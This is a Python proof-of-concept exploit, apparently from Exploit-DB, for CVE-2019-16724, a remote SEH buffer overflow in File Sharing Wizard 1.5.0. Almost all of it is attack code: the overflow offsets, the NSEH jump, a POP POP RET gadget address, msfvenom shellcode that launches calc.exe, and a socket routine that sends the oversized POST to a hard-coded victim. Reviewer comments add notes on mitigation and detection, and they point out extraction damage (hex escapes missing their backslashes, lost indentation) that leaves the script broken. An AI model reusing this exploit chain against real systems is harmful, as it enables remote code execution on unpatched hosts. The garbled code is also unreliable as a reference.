


File Sharing Wizard 1.5.0 – POST SEH Overflow



import socket
from struct import *

# Exploit Title: File sharing wizard 'post' remote SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Software Link: https://file-sharing-wizard.soft112.com/
# Version: 1.5.0
# Tested on: Windows 7
# CVE : CVE-2019-16724

# File-sharing-wizard-seh

#----------------------------------------------#
# Bad characters: x00        #
# SEH value:  0x909032EB  (JMP short)    #
# NSEH value: 0x7c38a67f (POP POP RET)  #
#----------------------------------------------#

#  Assigned CVE ID : CVE-2019-16724

# Lab target of the socket connection made at the bottom of the script (an
# RFC1918 address; the PoC hard-codes its victim instead of reading argv).
victim_host = "10.0.0.17"
victim_port = 80

# msfvenom -p windows/exec CMD=calc.exe -b "x00" -f python -v shellcode EXITFUNC=seh
# Payload bytes emitted by the msfvenom command above: the benign "pop calc.exe"
# marker usually used in proofs of concept, encoded so that the NUL byte listed
# as the only bad character in the header never appears.
# NOTE(review): as reproduced on this page the hex escapes have lost their
# backslash prefix, so these literals are plain ASCII text rather than byte
# values - presumably a page-extraction artifact; left as-is.
shellcode =  ""
shellcode += "xd9xc7xd9x74x24xf4xbax65x1dx84xe1x5f"
shellcode += "x29xc9xb1x31x31x57x18x03x57x18x83xef"
shellcode += "x99xffx71x1dx89x82x7axdex49xe3xf3x3b"
shellcode += "x78x23x67x4fx2ax93xe3x1dxc6x58xa1xb5"
shellcode += "x5dx2cx6exb9xd6x9bx48xf4xe7xb0xa9x97"
shellcode += "x6bxcbxfdx77x52x04xf0x76x93x79xf9x2b"
shellcode += "x4cxf5xacxdbxf9x43x6dx57xb1x42xf5x84"
shellcode += "x01x64xd4x1ax1ax3fxf6x9dxcfx4bxbfx85"
shellcode += "x0cx71x09x3dxe6x0dx88x97x37xedx27xd6"
shellcode += "xf8x1cx39x1ex3exffx4cx56x3dx82x56xad"
shellcode += "x3cx58xd2x36xe6x2bx44x93x17xffx13x50"
shellcode += "x1bxb4x50x3ex3fx4bxb4x34x3bxc0x3bx9b"
shellcode += "xcax92x1fx3fx97x41x01x66x7dx27x3ex78"
shellcode += "xdex98x9axf2xf2xcdx96x58x98x10x24xe7"
shellcode += "xeex13x36xe8x5ex7cx07x63x31xfbx98xa6"
shellcode += "x76xfdx69x7bx62x6axd0xeexcfxf6xe3xc4"
shellcode += "x13x0fx60xedxebxf4x78x84xeexb1x3ex74"
shellcode += "x82xaaxaax7ax31xcaxfex18xd4x58x62xf1"
shellcode += "x73xd9x01x0d"

# The two 4-byte fields of the overwritten exception-registration record:
#   nseh - the "next" pointer, filled with EB 32 90 90, i.e. `jmp short +0x32`
#          (50 bytes forward, into the NOP sled) followed by two NOPs; packed
#          as little-endian signed 32-bit ('<i', trailing space is ignored by
#          struct).
#   seh  - the handler pointer, the POP POP RET gadget described below; packed
#          as native-endian unsigned 32-bit ('I').
nseh = pack ('<i ',0x909032EB) # jmp short +0x32 (50 bytes) into the NOP sled
seh = pack('I',0x7c38a67f) # POP POP RET

# 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:Program Files (x86)File Sharing WizardbinMSVCR71.dll)
# The gadget is a fixed address in a CRT DLL bundled without ASLR/SafeSEH,
# which is what makes a hard-coded handler address viable; shipping a CRT
# built with those mitigations (or enforcing DEP) would break this chain.

# Buffer layout (offsets agree with the "Exact match at offset 1044" note
# below: 1040 bytes of filler, then nSEH at 1040-1043, SEH at 1044-1047):
exploit_payload  = "A" * 1040   # filler up to the nSEH field
exploit_payload += nseh # JMP short  (bytes 1040-1043)
exploit_payload += seh # POPPOPRET   (bytes 1044-1047)
exploit_payload += "x90" * 100 # NOPSLED the short jump lands in
exploit_payload += shellcode # popping calc.exe
exploit_payload += "D" *(5000 - len(exploit_payload))   # pad to a fixed 5000 bytes

# The overflow travels in the HTTP request line: the whole buffer is used as
# the request target of a POST, followed by the version token and the blank
# line that ends the headers.
# Detection/mitigation: this is not protocol-legal traffic - a request target
# of roughly 5 KB of repeated filler would trip a request-line length limit or
# a generic "oversized URI" rule on a reverse proxy or WAF in front of the
# service, and the header above lists only NUL as a bad character, so little
# can be done with encoding to shrink or disguise it.
payload_header  = "POST " + exploit_payload
payload_header +=" HTTP/1.0rnrn"

# overflowed SEH handler - 42386942 : [*] Exact match at offset 1044

# NOTE(review): the statements under try:/except: appear unindented on this
# page (presumably an extraction artifact), so as reproduced the script does
# not parse; left as-is.
try:
print("""
--------------------------------
CVE-2019-16724 proof of concept
File sharing wizard SEH overflow
--------------------------------
""")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4 TCP client socket
print("[x] Setting up a socket connection")
expl.connect((victim_host, victim_port))
print("[x] Establishing a connection to the victim")
# NOTE(review): str literals are concatenated with pack() output above and a
# str is handed to send(), which relies on Python 2 string semantics.
expl.send(payload_header)
print("[x] Sending ")
# NOTE(review): the bare except swallows every exception (KeyboardInterrupt
# included) and discards its reason - both messages print whatever failed -
# and the socket is never closed on either path.
except:
print("[!] Error establishing a connection")
print("[!] Error sending exploit")
            





https://www.exploit-db.com/exploits/47412
